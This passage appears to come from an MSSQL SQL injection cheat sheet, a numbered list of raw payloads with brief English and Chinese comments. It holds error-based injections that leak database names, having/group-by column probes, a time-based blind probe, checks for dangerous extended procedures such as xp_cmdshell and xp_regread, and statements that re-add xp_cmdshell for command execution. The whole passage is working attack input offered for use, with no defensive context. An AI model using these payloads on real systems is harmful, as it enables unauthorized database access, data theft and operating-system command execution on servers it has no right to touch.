863Id=1 and db_name()>0--
864
865# Convert data into integer error, can be used to explode library name, table name, data name
866Id=1 and 1=convert(int,(select name from master.dbo.sysdatabases where dbid=7))--
867
868
869Id=13 having 1=1 --
870Id=13 group by table name. field name 1, field name 2 having 1 = 1 --
871IF(ascii(SUBSTRING('name',1,1))>0) waitfor delay'0:0:3'
872
873# Command execution
874
875And select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
876And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread') #registry
877And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask') #backup
878And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc') #restore extension
879And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs') #Read subdirectory
880And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree') #列目录
881
882# Recovery and division
883Exec sp_addextendedproc xp_cmdshell, 'xplog70.dll'
884Exec sp_dropextendedproc 'xp_cmdshell'